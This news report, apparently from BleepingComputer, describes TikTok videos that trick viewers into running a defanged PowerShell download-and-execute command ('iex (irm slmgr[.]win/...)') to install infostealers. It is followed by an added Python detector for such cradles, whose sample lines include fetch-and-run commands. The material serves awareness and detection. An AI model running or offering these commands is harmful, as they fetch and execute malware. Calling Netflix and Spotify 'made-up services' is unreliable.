Cybercriminals are using TikTok videos disguised as free activation guides for popular software like Windows, Spotify, and Netflix to spread information-stealing malware.
ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one observed by Trend Micro in May.
The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium.
[Image: Malicious videos on TikTok pushing infostealers. Source: BleepingComputer.com]
The videos carry out a ClickFix attack, a social engineering technique that presents what look like legitimate "fixes" or instructions in order to trick users into running malicious PowerShell commands or other scripts that infect their computers with malware.
Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell:
iex (irm slmgr[.]win/photoshop)
Note that the program name in the URL varies with the software being impersonated: in the fake Windows activation videos, for example, the URL contains windows instead of photoshop.
In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script.
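The one-liner above is a fetch-and-evaluate cradle: a web request whose body is handed straight to the PowerShell evaluator. As an added detection example (not code from the article or the campaign), the following Python flags script-block text that has that shape, in either the `iex (irm url)` form shown or the `irm url | iex` variant, and marks hits on the article's slmgr[.]win domain; the sample lines are constructed and the event-4104 framing is an assumption about where such text would be logged.

```python
import re
from dataclasses import dataclass

# Campaign indicator taken from the article, kept defanged.
CAMPAIGN_DOMAIN = "slmgr[.]win"

# Two shapes of the download-and-execute cradle: iex (irm <url>)  and  irm <url> | iex
_EVAL = r"\b(?:iex|invoke-expression)\b"
_FETCH = r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b"
_TARGET = r"(?:-uri\s+)?['\"]?([^\s'\")]+)"
CRADLE_PATTERNS = [
    re.compile(rf"{_EVAL}\s*\(?\s*{_FETCH}\s+{_TARGET}", re.IGNORECASE),
    re.compile(rf"{_FETCH}\s+{_TARGET}['\"]?\s*\|\s*{_EVAL}", re.IGNORECASE),
]

@dataclass
class Finding:
    line_no: int
    host: str
    path: str
    known_campaign: bool

def split_target(token):
    """Return (host, path) from a URL token; scheme optional, defanging preserved."""
    rest = re.sub(r"^https?://", "", token, flags=re.IGNORECASE)
    host, _, path = rest.partition("/")
    return host, ("/" + path if path else "")

def scan_script_blocks(blocks):
    """Flag script-block text (e.g. PowerShell event 4104) that fetches and evaluates a URL."""
    findings = []
    for n, text in enumerate(blocks, 1):
        for pat in CRADLE_PATTERNS:
            m = pat.search(text)
            if m:
                host, path = split_target(m.group(1))
                known = host.lower().replace("[.]", ".") == CAMPAIGN_DOMAIN.replace("[.]", ".")
                findings.append(Finding(n, host, path, known))
                break
    return findings

# Constructed sample script-block lines, not real telemetry.
SAMPLE_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Downloads",
    "iex (irm slmgr[.]win/photoshop)",
    "iex (irm slmgr[.]win/windows)",
    "irm https://updates.example.test/setup.ps1 | iex",
    "Invoke-RestMethod -Uri https://api.example.test/status",  # fetch without eval: not flagged
]
```

Running `scan_script_blocks(SAMPLE_BLOCKS)` flags lines 2 to 4 and leaves the plain fetch on line 5 alone; an unknown host still surfaces as a suspicious cradle, since the article notes the path changes per impersonated product and new domains should be expected.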